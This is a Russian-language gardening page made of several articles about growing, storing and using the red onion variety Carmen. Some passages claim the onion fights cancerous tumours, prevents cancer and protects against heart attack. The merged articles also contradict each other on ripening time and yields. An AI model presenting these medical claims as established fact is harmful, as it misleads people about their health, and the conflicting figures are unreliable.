0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Лук севок кармен описание сорта

Лук-севок Кармен: описание и характеристика сорта красного лука

Разновидностей репчатого лука на сегодня существует довольно много. Каждый садовод выбирает наиболее подходящий для себя сорт, исходя из собственных вкусовых предпочтений, особенностей выращивания культуры, ухода, а также климатических характеристик местности. В статье речь пойдет о репчатом луке сорта Кармен. Этот овощ относится к красным сортам, поэтому отличается мягким приятным вкусом, и способен придать блюдам особую нежную пикантность.

В статье мы рассмотрим особенности выращивания лука Кармен: как его правильно посадить, как ухаживать. А кроме того, познакомимся с отзывами тех садоводов, которые выращивают на своих участках эту культуру.

Описание

Лук сорта Кармен — разработка голландских селекционеров, успешно применяемая в отечественном садоводстве. Это сорт завоевал уже неплохую популярность среди наших дачников благодаря своему мягкому вкусу и нетребовательности в уходе.

Сорт раннеспелый, что тоже нравится многим. Созревает он, в зависимости от климатической зоны, от 65 до 90 суток. В нашей стране лук Кармен начали выращивать не так давно, однако благодаря своим ценнейшим свойствам и неприхотливости культура завоевывает все больше поклонников во всех регионах.

На фото – Лук сорта Кармен:

Сорт созревает быстро: спустя 75-85 дней после посадки вы уже можете собирать богатый урожай. Даже в довольно холодном климате этого времени вполне достаточно, чтобы овощ успел полностью вызреть.

Лук Кармен содержит редчайший флавоноид под названием кварцитин. Это вещество способно бороться с раковыми опухолями, имеет и противоаллергическое воздействие. Также этот сорт лука содержит огромное количество полезных веществ, эфирных масел и микроэлементов. В нем много витамина С, а также содержатся полезные сахара. Лук Кармен может использоваться в целях профилактики и сердечно-сосудистых заболеваний, так как способствует очистке сосудов от залежей холестерина. А вот как выглядит лук порей Карантанский, рассказывается в данной статье.

Вкус у лука Кармен слегка сладковатый, что позволяет придавать с его помощью особенную пикантность блюдам. К тому же мякоть этого овоща очень сочная и хрустящая, из-за чего в свежем виде он особенно хорош.

Внешне овощ представляет собой крепкий плод насыщенного фиолетового или темно-красного оттенка, с красновато-коричневым цветом шелухи. Сама же луковая мякоть в данном случае белого цвета. Плоды имеют правильную округлую форму, немного приплюснуты. Вес средней луковицы колеблется от 50 до 70 грамм. Порой вырастают и довольно крупные экземпляры до 120 граммов. Длина зеленого пера у сорта Кармен — 30 см.

На видео – как выглядит лук Кармен:

Сорт очень лежкий, способен без гниения и утраты своих питательных свойств храниться до 8 месяцев. К тому же лук Кармен дает высокую урожайность. С одного квадратного метра засеянной грядки можно собрать до 2,5 кг овощей. А засеянный гектар дает 170 центнеров урожая.

Подготовка почвы

Чтобы весной лук Кармен благополучно прижился на грядке, готовить почву желательно начинать еще с осени. Выберите солнечный участок, где до этого росли томаты, огурцы, бобовые или картофель. Впрочем, грядка из-под капусты тоже подойдет. Грунт на данном участке огорода должен отличаться низкой кислотностью. Добиться снижения уровня кислотности можно с помощью известкования или обработки древесной золой.

Перед наступлением зимы на грядку вносится перегной, а весной после таяния снега участок посыпается древесной золой или же обрабатывается жидким раствором медного купороса. Эта мера помогает уберечь семена лука от загнивания, а также обеззараживает почву.

На видео – подготовка почвы под посадку лука:

Посадка семян

Из семян лук Кармен выращивают с целью получения севка, пригодного для посадки на следующий год. После сбора севок прогревают, чтобы луковки не сгнили за зиму, после чего убирают в сухое помещение для хранения. Температура хранения севка лука Кармен должна быть около +18-20 градусов при влажности воздуха 70%.

Можно ли посадить лук рядом с чесноком, и как это сделать правильно, указано в данной статье.

Также будет интересно узнать о том, можно ли сажать лук после чеснока.

А вот как выглядит на фото лук Ред Барон, можно увидеть здесь.

Когда же наступит зима, а вместе с ней и минусовые температуры на улице, в помещении для хранения лука температуру тоже можно понизить до 0 градусов — таким образом посевной материал прекрасно сохранится до следующей весны.

Можно сажать севок и под зиму. А чтобы нежные головки не сгнили во влажной холодной почве, сверху грядку мульчируют торфяным слоем в 10 см, затем поливают, и в таком виде оставляют в покое до весны. Можно сажать лук Кармен таким образом, только если климат достаточно теплый, поскольку, к примеру, сибирские морозы, могут полностью погубить весь будущий урожай на корню.

На видео – посадка семян лука:

Посадка в открытый грунт

Если с семенным выращиванием лука Кармен все понятно — оно аналогично всем остальным луковым сортам, то при выращивании на второй год взрослых луковиц из севка есть некоторые нюансы. Севок потребует уже меньше ухода, чем семена в первый год цикла, так как окреп, и имеет собственную развитую корневую систему.

Перед тем, как высаживать севок в грунт, его необходимо перебрать и рассортировать по размерам. Удалите из общей кучи больные, гнилые, слабые и мягкие луковки, оставив только крепкий и здоровый посевной материал.

Сортируйте севок по размерам на две кучки: в первой должны находиться луковки до 10 мм в диаметре, а во второй — те, что превышают этот показатель. Маленькие луковки рекомендуется сажать под зиму, а крупные — весной.

А вот как вырастить ялтинский лук из семян, поможет понять данное видео.

На видео – посадка лука в открытый грунт:

Перед тем, как высадить севок лука Кармен на грядку, ему требуется обработка дезинфицирующим составом для защиты от вредителей и заболеваний. Для этого луковки замачивают в растворе медного купороса или же приготавливают специальный состав, который продается в садовых магазинах для этой цели. Процедура называется протравкой, и проводится за 10-12 часов до помещения луковиц в открытый грунт.

Что касается времени высадки севка лука Кармен в открытый грунт, то это зависит от климатических особенностей данного региона. Важно, чтобы уже установилась стабильно теплая погода, а почва прогрелась на глубине 10 см до +16 градусов: данное условие необходимо соблюдать при посадке хоть семян лука, хоть севка. В большинстве регионов России подходящий период для помещения посевного материала лука Кармен в грунт наступает в конце апреля-начале мая.

Перед посадкой необходимо подготовить лунки, с дистанцией между рядами в 20 см. Между лунками оставляете 5-4 см, а сам севок заглубляйте на 3 см.

Перед тем, как приступать к посадке, обязательно нужно подготовить грядку: вскопать, взрыхлить, удалить сорняки, полить, внести подкормку, если в том есть необходимость. Лук не выносит застаивания вод в почве, поэтому важно, чтобы грядка была расположена не в низине. При посадке следите, чтобы грунт возвышался над луковками не более чем на полтора сантиметра. А вот как выглядит лук репчатый Эксибишен, и как его необходимо высаживать, указано в данной статье.

Особенности ухода

Грунт с кислой реакцией для этого сорта лука не подходит. Но если провести процедуру известкования, то можно справиться с проблемой. В качестве удобрений для луковой грядки можно использовать органику, а также древесную золу и медный купорос. Важно, чтобы грядка не заросла сорняками, поэтому вовремя проводите прополку

А чтобы получить крепкую и большого диаметра луковую репку, опытные садоводы рекомендуют в конце июня пригнуть зеленое перо к земле, и прекратить полив. Тогда растение бросает все свои силы на формирование «жировых запасов» – и репка становится больше. Для тех кто хочет понимать, какие сладкие сорта лука репчатого существуют, и как они выглядят, стоит перейти по ссылке.

На видео – как ухаживать за посаженным луком:

За пару недель до сбора урожая рекомендуется убрать землю от луковиц или же произвести обрезку корней. Но первый вариант легче выполним, поэтому предпочтительнее. Обычно период сбора лукового урожая приходится на начало августа-начало сентября в зависимости от погодных условий конкретного региона.

После выкапывания из земли луковицы необходимо просушить. Если стоит теплая сухая погода, то эту процедуру можно произвести непосредственно на поверхности грядки. В противном случае рекомендуется убрать урожай для просушки на чердак. А вот как пикировать лук чернушку, поможет понять данная информация.

Хранение севка

После того, как по завершении первого года двухлетнего цикла вы собрали лук севок, его необходимо хранить всю зиму до посадки в грунт следующей весной. Сразу после выкапывания из земли луковки необходимо продержать неделю в сухом помещении при температуре +25 градусов. Через неделю температуру повышают до +30 градусов, и сушат лук еще неделю.

Затем снова повышают уже до + 35 градусов, и снова сушат неделю. Последним этапом идет повышение температуры до +42 градусов: в этих условиях севок выдерживают 10 часов. После этого этапа сушка завершена, а лук готов к зимнему хранению. Процедура сушки предупреждает поражение севка мучнистой росой и шейковой гнилью.

Отзывы

В целом все дачники, выращивающие этот сорт лука, рекомендуют его как неприхотливую, урожайную и очень вкусную овощную культуру. К тому же созревает овощ рано, что дает возможность насладиться его вкусом уже в начале августа.

Многие садоводы особенно подчеркивают великолепную устойчивость лука Кармен к поражению вредителями и болезням. А некоторые отмечают, что растение спокойно и без последствий может выдерживать значительные температурные перепады, прохладу и засуху. Узнаем, что говорят садоводы, выращивающие лук Кармен на собственных участках.

  • Павел, 47 лет, Тула: «О луке Кармен я узнал три года назад. Купил семена, вырастил. Особых хлопот не было, все процедуры по уходу схожи со стандартными при выращивании обычного лука. На второй год посадил уже севок, и в конце августа собрал приличный урожай, что для первого раза, считаю, замечательный результат. Все домашним понравился вкус этого лука, буду сажать снова».
  • Наталья, 52 года, Новосибирск: «Хоть я и живу в Сибири, но сумела уже на своем дачном участке вырастить много теплолюбивых растений. Лук я использую широко — и в салаты, и в заготовки, поэтому на интересные сорта всегда обращаю внимание. Два года назад попробовала вырастить красный сорт Кармен — получила отличный урожай, а сам лук порадовал приятным не слишком острым вкусом. Хранится отлично всю зиму, не гниет, не портится. Буду сажать этот сорт снова. Рекомендую это замечательное растение: неприхотливое, вкусное и полезное

Итак, мы рассмотрели особенности выращивания лука Кармен в открытом грунте. Как вы видите, данная культура при всех своих замечательных вкусовых характеристиках не отличается особенной прихотливостью. Поэтому вырастить лук Кармен под силу любому дачнику — было бы желание.

Среднеспелый сорт лука «Кармен» со слабоострым вкусом

Кармен – неприхотливый в уходе среднеспелый сорт лука. В народе его называют красным или сиреневым. Культура пользуется популярностью благодаря необычной окраске, мягкому вкусу, богатому витаминному составу.

Из статьи вы узнаете, как правильно выращивать лук Кармен на огороде, каковы преимущества и недостатки этого сорта.

Описание сорта

Лук Кармен широко распространен в РФ, в том числе и в северных регионах.

Сорт характеризуется следующими особенностями:

  • средним сроком созревания, составляющим от 75 до 90 дней;
  • отличным показателем всхожести, доходящим до 100%.
  • высокой урожайностью;
  • малогнездностью (1-2 луковицы в гнезде);
  • средним размером аккуратных луковиц, их вес в среднем составляет 50-70 г;
  • белоснежной мякотью с сиреневыми прожилками и темно-красной или фиолетовой шелухой;
  • отличной лежкостью урожая.

Справка. Лук Кармен особенно вкусен в свежем виде. Его рекомендовано использовать при приготовлении салатов. Подвергать термической обработке луковицы не желательно. При тушении, запекании и варке теряется большая часть полезных веществ.

Происхождение и развитие

Кармен — достижение голландской селекции. Сорт популярен во всем мире, но в России его начали выращивать не так давно. Он полюбился отечественным огородникам за приятный слабоострый вкус и неприхотливость в уходе.

Химический состав, микроэлементы и витамины и полезные свойства

Сорт Кармен отличается богатым химическим составом и лечебными свойствами, обусловленными, в частности, высоким содержание антоцианов. Эти вещества с антиоксидантными свойствами придают луковой шелухе красивую фиолетовую окраску.

В красном луке много флавоноидов, в частности кверцетина. Он обладает противовоспалительным, антигистаминным, спазмолитическим, диуретическим воздействием.

Овощная культура этой сортовой принадлежности богата эфирными маслами, полезными микроэлементами (магнием, железом, калием и другими), витаминами. Отличается высоким содержанием аскорбиновой кислоты – в луковице ее содержится от 4 до 19,5 мг.

Луковицы Кармен содержат много сахарозы и фруктозы.

Употребление в пищу овощной культуры этого сорта:

  • снижает риск развития онкологических заболеваний;
  • уменьшает уровень «плохого» холестерина;
  • снижает активность бактерий и вирусов.

Срок созревания

Кармен — среднеспелый сорт. С момента посадки семян до сбора урожая проходит от 75 до 90 дней. После 100 суток наблюдается пожелтение луковых перьев.

Справка. Если выращивать овощную культуру из рассады, лук созревает за 6-7 недель. Это дает возможность собирать по 3 урожая за лето в южных регионах страны.

Урожайность

Сорт характеризуется высокой урожайностью. С 1 м² посадки собирают 1,5 — 2,5 кг лука, на промышленных полях с 1 га – 15-17 т.

Устойчивость к болезням

Кармен характеризуется стойким иммунитетом к болезням и не склонен к стрелкованию. Лук не подвержен поражению гнилью, ложной мучнистой росой и ржавчиной. Ему редко вредят трипсы и луковая муха.

Характеристика луковицы, описание внешнего вида, вкусовые качества

Луковицы отличаются округлой формой, достаточно крепкие, покрыты темно-красной или фиолетовой шелухой. Имеют белую мякоть с сиреневыми прожилками.

Средний вес луковицы составляет 50-70 г. При особенно благоприятных условиях достигает 120 г. Зеленым перьям присуща длина 30 см.

Луковицам сладкие, сочные, умеренно острые. Волокна не отличаются плотностью.

Для каких регионов подходит лучше всего и какая требовательность к климату

Лук Кармен хорошо растет в регионах:

  • Центральном;
  • Средневолжском;
  • Центрально-Черноземном.

Его можно выращивать и в северной части страны. Сорт хорошо переносит перепады температуры, засуху и период дождей.

Важно. Овощная культура светолюбива. Недостаток солнечного света провоцирует грибковые заболевания.

Главные преимущества и недостатки сорта

В числе достоинств лука этой сортовой принадлежности:

  • возможность выращивания в любом регионе;
  • холодостойкость;
  • сильный иммунитет;
  • высокая урожайность;
  • луковицы одного размера, ровные;
  • привлекательный товарный вид и отличный вкус;
  • хорошая лежкость.

Недостатки у сорта практически отсутствуют за исключением требовательности к почве для выращивания.

В чем отличие от других сортов

От других сортов репчатого лука Кармен отличается:

  • особым мягким вкусом, сладким и малоострым;
  • внешним видом;
  • повышенным содержанием витаминов;
  • наличием в составе овоща антиоксидантов антоцианов;
  • устойчивостью к заболеваниям и вредителям.

Сравнение популярных сортов репчатого лука:

Название Срок созревания Урожайность, кг/м² Масса луковиц Окрас шелухи Вкус
Кармен средний 1,5 — 2,5 50-70 темно-красный, фиолетовый сладкий, слабоострый
Веселка средний 3-4 75 фиолетово-красный полуострый
Рубин средний 2,8-3,2 60-80 розово-фиолетовый полуострый
Сквирский средний 1,6-2 60-90 желтый полуострый
Стригуновский носовский средний 1,5-2,1 60-125 светло-желтый острый
Ткаченковский средний 4-5 70 светло-коричневый острый

Особенности посадки и выращивания

Кармен на огородном участке выращивают из семян или из мелких однолетних луковичек (севка). Севок должен быть качественный, ровный и плотный. В противном случае хорошего урожая не будет.

Справка. Опытные огородники первый год высеивают семена для получения севка, а на второй год высаживают, чтобы получить крупные головки лука.

Подготовка к посадке

Севок требует предварительной подготовки перед высаживанием в открытый грунт. Луковички выдерживают в слабом растворе марганцовки, затем прогревают на батарее. После проращивают, накрыв влажной марлей. Как только появятся побеги, приступают к посадке.

Участок под лук готовят с осени. Выбирают хорошо освещаемое солнцем место, где ранее выращивали картошку, капусту, огурцы, бобы, помидоры. Землю удобряют перегноем. Весной перед посадкой грунт посыпают древесной золой, чтобы не допустить загнивания луковичек.

Требования к грунту

Сорт Кармен требователен к почве. Для выращивания овощной культуры не подходит кислый грунт. Исправить ситуацию можно известкованием и созданием высоких грядок. Красный лук хорошо растет на нейтральных почвах. При выращивании в песчаном грунте потребуются максимально низкие грядки.

Сроки, схема и правила посадки

Срок посадки определяется климатическими условиями местности и длится со второй половины апреля до первых чисел мая. Земля должна быть прогретой до + 16ºC.

Лук высаживают по стандартной схеме. Дистанция между рядами не должна превышать 20 см, между лунками 5-7 см. Глубина лунки – 2,5-3 см.

Особенности выращивания

Овощную культуру не выращивают на одном и том же участке несколько лет подряд. Есть риск грибкового поражения. Рекомендован возврат на бывшее место посадки не раньше, чем через 4 года.

Нюансы ухода

Особый уход сорту не нужен. Но важно выполнять базовые процедуры:

  • тщательно пропалывать грядки (остатки сорняков могут спровоцировать заболеваемость растений);
  • поливать по мере высыхания почвы;
  • контролировать наличие вредителей и своевременное их уничтожать.

Режим полива

После посадки лук нуждается в обильном поливе, затем частоту сокращают. Стараются избегать переувлажнения, чтобы уберечь посадку от грибкового поражения. Если регулярно идут дожди, поливы прекращают совсем.

Рыхление почвы и прополка

Лук требователен к аэрации грунта, не терпит сорняков. При его выращивании требуется:

  • неглубокое рыхление междурядий на следующие сутки после каждого полива или дождя.
  • регулярная прополка для устранения сорняков.

Подкормка

Сорт требует 2-3 подкормок в течение сезона по схеме:

  • внесение нитрофоски, мочевины спустя 14 суток после посадки;
  • подкормка фосфорно-калийными удобрениями спустя 28 суток после посадки;
  • на 43 день повторное внесение фосфорно-калийного состава.

Справка. После внесения удобрений почву обильно поливают, смывают с растений их остатки.

Борьба с болезнями и вредителями

Наиболее опасные вредители овощной культуры:

  • луковый скрытнохоботник;
  • луковая муха;
  • стеблевая нематода;
  • луковая моль;
  • корневой клещ.

От поражения вредителями и заражения грибковыми организмами поможет опрыскивание растений следующими средствами:

  • «Глиокладином»;
  • «Фитоспорин-М»;
  • «Алирином»;
  • «Гамаиром»;
  • раствором Цинеба (0,04%);
  • раствором хлорокиси меди (0,5%);
  • бордоской смесью.

Сбор и хранение урожая

Своевременно собранный урожай и правильные условия его хранения – залог высокого показателя лежкости продукта.

Как и когда собирать

Сбор урожая проводят в последних числах августа – начале сентября, в зависимости от региона. За 30 дней до уборки прекращают полив. Лук выкапывают, когда перья подсохли, а верхушки луковок видны из-под земли. Делают это в ясную сухую погоду.

Особенности хранения и лежкость сорта

Собранный урожай подсушивают на солнце, затем убирают на хранение в сухое чистое место, где влажность не превышает 70%. Лежкость у лука Кармен хорошая. Урожай хранится почти без потерь в течение 8 месяцев.

Какие могут быть трудности при выращивании

При выращивании лука Кармен иногда возникают такие трудности:

  • пожелтение перьев;
  • возникновение горечи в луковице.

Причины пожелтения:

  • дефицит в грунте азота;
  • культура поражена вредителем или болезнью;
  • нарушение агротехники.

Причины горечи:

  • дефицит фосфорных удобрений;
  • сухая почва.

Советы опытных огородников

Для профилактики болезней и вредителей опытные огородники рекомендуют:

  • отказаться от использования сомнительного и некачественного посадочного материала;
  • проводить предпосадочную обработку грунта и инвентаря «Инта-Виром», «Искрой», «Громом»;
  • высаживать рядом с грядкой лука Кармен чеснок, кориандр, хрен, полынь, бархатцы.

Отзывы о сорте лука Кармен

Отзывы о сорте лука Кармен в подавляющем большинстве положительные.

Николай 54 года, Тверь: «О луке Кармен мне рассказали мои друзья пару лет назад. Приобрел семена, начал выращивать. Особых трудностей при выращивании не возникло. Уход похож с уходом за обычным луком. На следующий год высадил севок. В конце августа собрал хороший урожай. Мне нравится этот лук за приятный сладковатый вкус».

Нина 46 лет, Новосибирск: «Несмотря на то, что я проживаю в Сибири, мне удалось вырастить на своем огороде много разных овощных культур. Два года назад я решила вырастить красный сорт Кармен. Собрала отличный урожай, который порадовал не очень острым вкусом. Лежкость у сорта хорошая, урожай пролежал целую зиму практически без потерь».

Заключение

Кармен — неприхотливый, устойчивый к неблагоприятным условия сорт, обладающий отменными вкусовыми качествами. Выращивая культуру по всем правилам агротехники, вы получите отличный урожай при минимальном уходе. Выполняя базовые серы профилактики, несложно уберечь урожай от вредителей и болезней.

Лук Кармен: описание сорта

Для сбора большого урожая важно соблюдать все рекомендации по выращиванию конкретного растения. Лук Кармен также имеет свое описание сорта, позволяющее вырастить красивые и вкусные луковицы, которые будут сохраняться длительное время в условиях подвала и квартиры. Плоды обладают уникальными целебными свойствами и могут заменить целый комплекс витаминов, добавив при этом в блюдо нежные и запоминающиеся нотки вкуса.

Общее описание сорта

Привлекательные и запоминающиеся фиолетовые луковицы были выведены растениеводами в Голландии, после чего семена распространились в другие страны. Свое признание Кармен, этот сорт растения еще называют ред и красный лук, получил благодаря запоминающемуся вкусу и отсутствию жжения в глазах при готовке.

Голландским селекционерам удалось вывести сорт лука, который успевает полностью вызреть в период 75-90 дней, если высаживать его из семян. При посадке рассады для выращивания и созревания овоща требуется не более 6-7 недель. Это свойство сделало лук Кармен популярным в южных регионах, где садоводы могут собрать до трех урожаев за один летний сезон. При соблюдении советов по выращиванию плоды также показывают отличный результат в центральной и северной полосе.

Главной особенностью сорта является яркий красно-коричневый окрас кожуры. На мякоти помимо привычных белых полос видны фиолетовые прожилки. Особенно ценен такой вид плода для хозяек, любящих использовать луковицы для украшения блюд.

В составе плодов имеется большое количество сахара, позволяющее использовать Кармен в салатах без какой-то обработки и в блюдах, требующих термических манипуляций. Сорт отличается выраженными вкусовыми качествами.

При правильном уходе высота ботвы может достигать 25-30 см. Средний размер одной головки имеет вес примерно 80 г, максимальный вес плода может достигать 120 г. Каждая луковица имеет круглую форму, слегка приплюснутую по бокам. При отсутствии повреждений и правильном сборе, поливе собранный урожай можно сохранять в течение 6-8 месяцев. Срок хранения зависит от температурного режима, в квартире плоды быстрее поддаются гнили и порче.

Видео — Лук Кармен: отличительные свойства

Внимание! Для хорошего урожая следует брать только качественную рассаду, особенно важно делать это в северных регионах, где нет длительного летнего сезона. Правильное огородное соседство также сыграет положительную роль в выращивании сорта Кармен и не снизит конечную урожайность.

Цены на семена лука Кармен

Как выбрать материал для посадки?

При выборе луковиц для их посева в грунт рекомендуется следовать следующим рекомендациям:

  • не брать плоды, имеющие какие-либо механические повреждения;
  • нельзя брать лук со следами гнили или грибка;
  • выбранная луковичка должна иметь четкую форму и быть плотной;
  • лук-севок всегда подлежит калибровке.

Внимание! Та рассада, что имеет диаметр менее 1 см, должна высаживаться под зиму. Если репка, как еще называются луковицы, имеет диаметр свыше 10 мм, ее лучше сохранять до весеннего посева.

Правила хранения луковиц Кармен

Для получения богатого урожая важно сохранить все плоды и не допустить их порчи гнилью и грибками. Для этого достаточно выполнить несколько простых правил.

  1. В течение семи суток весь посевной материал хранят в помещении или на открытом воздухе в температурном режиме +23-+25 градусов.
  2. Через неделю температуру следует увеличить на пять градусов. Через такой же промежуток времени температурный режим должен составить +35 градусов.
  3. На последнем этапе повышения температуры она должна достигать +42 градусов. В таких условиях репки выдерживают в течение десяти часов.
  4. После этого семена перемещают в закрытое помещение, оно может быть прохладным или же теплым, важно выдержать условия по температурному режиму и влажности.
  5. При хранении лука Кармен в теплой комнате следует держать уровень температуры на границе +18-+20 градусов. Влажность не должна превышать 65-70%.

Подробнее о том, как убирать лук с грядки на хранение можно прочитать в нашей статье.

Неплохим вариантом хранения является высадка лука Кармен на зиму в грунт. Для этого выбранную грядку сначала посыпают торфом, толщина слоя составляет 10 см. После этого почву хорошо увлажняют и не трогают до первых морозов. Как только вы зарегистрируете ночные заморозки в течение трех суток, следует высадить все луковички. Для этого сначала снимают торф в местах посадки, садят репку, и вновь закрывают ее убранным верхним грунтом. Повторной поливки грядка не требует.

Внимание! Если в доме температура высокая и нет возможности ее снизить, лучше покупать посевной материал непосредственно перед посадкой. Иначе в таких условиях хранения все плоды пересохнут и могут покрыться мучнистым грибком.

Посадка лука Кармен весной

Если удалось сохранить севок, важно правильно его посадить, чтобы получить необходимый урожай. Для хорошего результата требуется садить лук Кармен в последнюю неделю апреля или первую неделю мая. На грядку вначале выливают любую подкормку для почвы и растения. После этого на каждый квадратный метр требуется высадить не более 700 гр. луковиц.

Важно, чтобы при посадке над репками слой почвы не был более 15 мм., так как это помешает правильному росту рассады. После посадки луковиц уход за грядкой простой. Достаточно своевременно подкармливать, поливать и рыхлить грунт, чтобы растение получало необходимое количество питательных веществ и воздуха.

При выращивании лука Кармен огородники выявили одну закономерность. Чтобы вырастить хорошие репки, требуется прекратить рост перьевой части растения. Для этого в конце июня зеленую часть лука пригибают к земле и больше не поливают грядку. После этого начинает активно расти часть растения, которая находится под землей.

Урожай обычно собирают с первой недели августа до первой недели сентября. При этом луковицы рекомендуется не тащить, а аккуратно подкапывать. После сбора все репки сразу распределяют на активную просушку. Если погода сухая и теплая, сушить репки можно прямо на грядке.

Внимание! За 14 дней до планируемого сбора урожая рекомендуется отгрести землю от луковиц, это позволит им еще больше набрать в своем весе.

Высадка лука из рассады

При использовании семян их следует обязательно прорастить.

  1. В небольшой деревянный ящик следует набрать небольшое количество земли.
  2. Ее обрабатывают раствором марганцовки, чтобы убить все вредоносные бактерии.
  3. После этого густо высыпают семена и слегка их прикрывают почвой.
  4. Обязательно полить будущие всходы небольшим количеством воды комнатной температуры.
  5. Ящик до появления ростков держат на подоконнике, чтобы на грунт постоянно попадал солнечный свет.
  6. Для ускорения всхода на ящик можно надеть клеенку.
  7. Рассаду высаживают только в прогретую землю. Идеальным вариантом станет пересадка всходов в конце мая.
  8. Для защиты рассады грядку можно покрыть пленкой до хорошего тепла.
  9. После этого за луком ухаживают по обычному сценарию, как если бы его растили из луковиц.

Внимание! При выращивании лука Кармен из рассады не следует трогать его зеленую часть, чтобы получить максимально крупные луковицы. Рвать перья можно только в конце июня начале июля.

Цены на марганцовку

Особенность почвы для посадки

При высадке репок следует обращать внимание на грунт, в котором планируется растить севок. Не каждая почва подойдет для лука Кармен. С тем, какой грунт лучше для посадки сорта, можно ознакомиться в таблице.

Таблица. Грунт для посадки лука Кармен.

Тип почвы Возможность использования
Кислая Полностью не подходит
Заболоченная Частично подходит, только при создании высоких грядок
Кислые почвы после известкования Частично подходят, требуют высоких грядок
Нейтральные почвы Идеально подходят
Песчаные почвы Частично подходят, грядки должны быть максимально низкими

Внимание! Если вы желаете выращивать лук Кармен, но ваша почва абсолютно для этого непригодна, плоды можно посадить в небольшие стаканчики и растить их прямо на балконе или подоконнике. При этом требуется также не забывать удобрять и поливать репки. При правильном уходе даже такой вариант выращивания сорта Кармен даст хороший результат.

Урожайность сорта Кармен

Этот вид лука отличается высокой урожайностью. При соблюдении рекомендаций по посадке и уходе с одного квадратного метра удается собрать более двух килограммов репок. С учетом аккуратности сбора, погодных условий, свойств почвы, использования удобрений количество собранных плодов может меняться в большую или меньшую сторону.

Внимание! Огородники настаивают на том, что максимальный урожай удается получить из двухлетнего растения, которое высаживается в форме небольших луковичек.

Отзывы садоводов о выращивании лука Кармен

Специалисты и дачники крайне положительно отзываются о выращивании сорта на своих грядках. Все хозяйки описывают сорт Кармен, как один из самых некапризных. Так как этот лук является гибридным, удалось добиться его хорошей сохранности при любых температурах.

Растение не боится температурных перепадов, дает хороший урожай в засушливое и холодное лето. Репки не требуют частого полива, поэтому могут выращиваться на отдаленных участках, куда не удается часто приезжать.

Особенности применения и ценность продукта

В репках лука Кармен находится большое количество витамина С, полезные сахара и минералы. Регулярное употребление продукта становится отличной профилактикой раковых заболеваний, подавляет инфекции, в том числе хронического характера. Полезен лук Кармен также для сердца и кровеносной системы. Его регулярное использование снижает уровень вредного холестерина и защищает от инфаркта.

Употреблять лук сорта Кармен рекомендуется без какой-то обработки, так как таким образом удается сохранить все минералы и витамины. При жарке остается менее 20% от начального уровня полезных веществ, при мариновании – менее 60%.

Внимание! Несмотря на отсутствие обработки, неприятный запах от продукта быстро улетучивается, что позволяет употреблять его ежедневно.

Важные особенности выращивания

  1. Удобрения можно применять не чаще трех раз за сезон. Первый раз минеральную добавку вносят через 14 дней после посадки, повторяют еще через две недели. Третья подкормка делается на 16 сутки после второй.
  2. Вначале поливать почву требуется через 1-2 дня с учетом ее типа. Важно, чтобы земля была влажной, но без признаков заболоченности, так как могут активизироваться грибки.
  3. Между каждой луковичкой рекомендуется выдерживать расстояние в 7-10 см.
  4. Перед посадкой в грунт почву рекомендуется обработать слабым раствором марганцовки.
  5. Максимальная глубина посадки репки составляет 35 мм.

Внимание! При соблюдении этих советов высокая урожайность лука гарантирована даже при холодном лете или коротком теплом периоде.

Сорт лука Кармен – действительно уникальный вид, позволяющий получить богатый урожай при минимальном затрате сил и времени. Некапризность в хранении и прекрасный вкус позволил сорту прочно укорениться на грядках огородников всех климатических зон, позволяя получать крупные репки из года в год.

Характеристика и описание сорта лука Кармен МС, выращивание и уход

Лук – огородная культура, которую наряду с другими овощами выращивает большинство дачников. Они выбирают сорта, которые нравятся им больше всего. Например, те, кто трудится на своей земле, часто обращают внимание на лук Кармен МС. Он обладает рядом ценных сельскохозяйственных качеств, потому завоевывает все большее количество поклонников среди огородников. Узнайте об этом сорте подробнее, возможно, что он придется по душе и вам.

Характеристики и описание

Сорт лука Кармен МС среднеспелый, от всходов до образования товарных головок должно пройти 90-100 дней. Рекомендуется культивировать его по всей территории РФ, но в особенности в Центральном, Средневолжском и Центрально-Черноземном регионах. Можно выращивать лук как в 1-летней (из семян через рассаду), так и 2-летней культуре (получение севка в первый год, и получение репки из него на второй год).

По описанию оригинатора лук Кармен МС имеет следующие характеристики:

  • зеленые перья высотой до 30 см;
  • головки округло-плоские, выровненные, 2-3 зачатковые;
  • плотность луковицы средняя;
  • покровные чешуи красно-фиолетовой окраски, сочные – белые, с оттенком фиолетового цвета;
  • вкус луковиц – слабоострый, почти сладкий.

Урожайность сорта Кармен МС с 1 м 2 грядок – до 2,5 кг при среднем весе головок 50-80 г. Отдельные экземпляры могут вырастать до 120 г. Вызреваемость головок перед сбором 90-100%, после доспевания — 95-100%. На 100 г луковиц приходится: 7,6-8,9% -сахаров, 3,8-19,4 мг аскорбиновой кислоты, 11,9-13,9% — сухого вещества.

Вызревшие головки лука сорта Кармен МС используют в основном для употребления в свежем виде в составе салатов благодаря его хорошему вкусу, большому содержанию витамина С и фитонцидов.

Впрочем, их можно применять и для приготовления гарнира для мясных и рыбных блюд, для маринования, добавлять в домашние заготовки. В вареном или жареном виде этот лук используют реже, так как он приобретает сероватый оттенок, что нравится далеко не всем хозяйкам.

Головки сорта Кармен МС отличаются неплохой лежкостью, поэтому их можно отправить на хранение. При благоприятных условиях (в сухом и прохладном месте) они смогут пролежать в хранилище до 8 месяцев, что для раннего и красного лука является очень неплохим результатом. Потери при этом незначительные.

Достоинства и недостатки

Репчатый лук сорта Кармен МС обладает рядом достоинств, ради которых его с удовольствием выращивают овощеводы. Особенно он нравится им из-за:

  • пригодности к выращиванию в любых регионах;
  • возможности возделывания посевом чернушки и высаживанием севка;
  • нетребовательности к почвам при условии обеспечения хорошей аэрации и дренажа;
  • холодостойкости;
  • устойчивости к заболеваниям и стрелкованию;
  • неплохой урожайности;
  • однородного размера головок;
  • их симпатичного фиолетового цвета и хорошего вкуса;
  • того, что они обладают хорошим товарным видом, то есть их можно выращивать и для продажи;
  • возможности долгого хранения.

Недостатков у лука Кармен МС нет, кроме некоторого ограничения в применении в термически обработанном виде.

Агротехника выращивания и ухода

Лук Кармен МС культивируют в 2-летней культуре. В первый год заделывают семена в грунт и в конце сезона собирают маленькие луковички – севок. Их хранят до весны или высаживают на грядку осенью под зиму. На второй год выращивания получают репку. В южных районах посадку семян проводят сразу в открытый грунт, на севере отличные результаты показывает рассадный способ. Также возможно получение репки в однолетней культуре при посеве семян на рассаду.

